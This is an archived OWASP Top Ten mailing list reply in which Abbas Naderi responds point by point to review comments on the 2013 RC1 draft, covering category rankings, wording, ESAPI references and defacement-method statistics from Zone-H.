[Owasp-topten] RC1 comments

Abbas Naderi abbas.naderi at owasp.org
Sun Feb 17 14:31:31 UTC 2013

Great comments, I have added something to each of them:
On ۲۹ بهمن ۱۳۹۱, at ۱۷:۴۵, "Paweł Krawczyk" <pawel.krawczyk at hush.com> wrote:

> Several comments to the RC1 draft of proposed OWASP Top 10 2013 version:
> The rank seems to be highly impacted by vulnerability prevalence, which is in turn based on data provided by a number of vendors. The question is - how much are vendor observed potential vulnerabilities related to vulnerabilities being actively exploited in wild? As this is rather complex topic, I'm moving the discussion to the bottom of these general comments.
This is something of note, but it's always been like this. It's a matter of OWASP community as world security experts agreeing on these, not just raw data getting processed.
> Wording - we should probably give this to someone unrelated to security for proof reading. We should really pay attention to readability of the text - sentences like "application functions related to authentication and session management are often not implemented correctly" (page 7) can be significantly simplified with little loss of formal correctness.Statements like "many web applications" or "virtually all applications" just inflate text volume, without really bringing information value.
Great, someone would step up for this? I'm not very good with formal English.
> OWASP ESAPI is recommended in almost every "How do I prevent" section, but ESAPI really does exist for Java, so in case of other popular environments we're sending people to nowhere. We should reference Cheat Sheets, as these in turn frequently reference specific solutionss on specific platforms.
100% agreed. ESAPI is a dead cause (for now) and referring to it is not so good. We're filling in its holes for PHP in OWASP PHP Security project, with lots of different pages. Same goes for others.
> A2 Broken Authentication and Session Management - it has very high rank, but how frequently this is actually being used to compromise websites and users?
> Section header "Am I Vulnerable to Hijacking?" - hijacking of what?
Of course session hijacking, back to your 2nd comment.
> Scenario #3 in Example attack scenarios - this has little to do with session and authentication.
> A3 Cross-Site Scripting (XSS) - same as above. It's easy to spot and very frequent in applications, but it doesn't deserve such a high rank.
Actually it does. I'm a known hacker and XSS is always the second choice.
> A5 Security Misconfiguration - this seems to be catch-all category, but I believe it's fully justified and should probably have higher rank, taking into account how frequently it's used to compromise sites.
> A7- rename to "Broken Access Level Controls" or something like that.
As I suggested earlier, this has to be mixed with A4, as insufficient access control. We're really forgetting that security is mostly Authentication and Authorization, and authorization is so undermined in Web.
> A9 rename to "Infrastructure and Server Vulnerabilities"
Why ??
> Not sure which category would catch Remote File Inclusion, which still seems to be most popular way of compromising websites. Would it go under A1 Injection?

RFI is not number one. Since 2007, 80% of flawed websites are immune to RFI.

> Now going back to the vulnerability prevalence - my comment above is based on the observation that severity of vulnerabilities reported by vendors, especially based on automated scans, is not always relevant to actual chances of them being exploited in wild. Real world intrusion data is not very available, which makes statistical analysis difficult but there are still some hints out there. I have been recently working on a research project that focused on that topic and analysed ~300k website defacement reports (courtesy of Zone-H). Distribution of methods was as follows:
>   File Inclusion 36.884%
>   SQL Injection 13.021%
>   known vulnerability (i.e. unpatched system) 9.777%
>   undisclosed (new) vulnerability 6.875%
>   Other Web Application bug 6.264%
>   Other Server intrusion 5.094%
>   configuration / admin. mistake 3.187%
>   Web Server intrusion 2.739%
>   URL Poisoning 2.728%
>   brute force attack 2.605%
>   Remote administrative panel access through bruteforcing 1.466%
>   Web Server external module intrusion 1.424%
>   SSH Server intrusion 1.002%
>   Shares misconfiguration 0.999%
>   FTP Server intrusion 0.942%
>   Telnet Server intrusion 0.808%
> Attack against the administrator/user (password stealing/sniffing) 0.750%
>   social engineering 0.740%
>   RPC Server intrusion 0.595%
>   Mail Server intrusion 0.454%
>   Rerouting after attacking the Firewall 0.378%
>   Rerouting after attacking the Router 0.283%
>   Remote service password bruteforce 0.223%
>   Cross-Site Scripting 0.168%
>   Remote service password guessing 0.144%
>   DNS attack through cache poisoning 0.121%
>   DNS attack through social engineering 0.121%
>   Access credentials through Man In the Middle attack 0.100%
>   Remote administrative panel access through password guessing 0.071%
>   Remote administrative panel access through social engineering 0.037%
> _______________________________________________
> Owasp-topten mailing list
> Owasp-topten at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-topten

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-topten/attachments/20130217/de7a5418/attachment.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 4889 bytes
Desc: not available
URL: <http://lists.owasp.org/pipermail/owasp-topten/attachments/20130217/de7a5418/attachment.bin>

More information about the Owasp-topten mailing list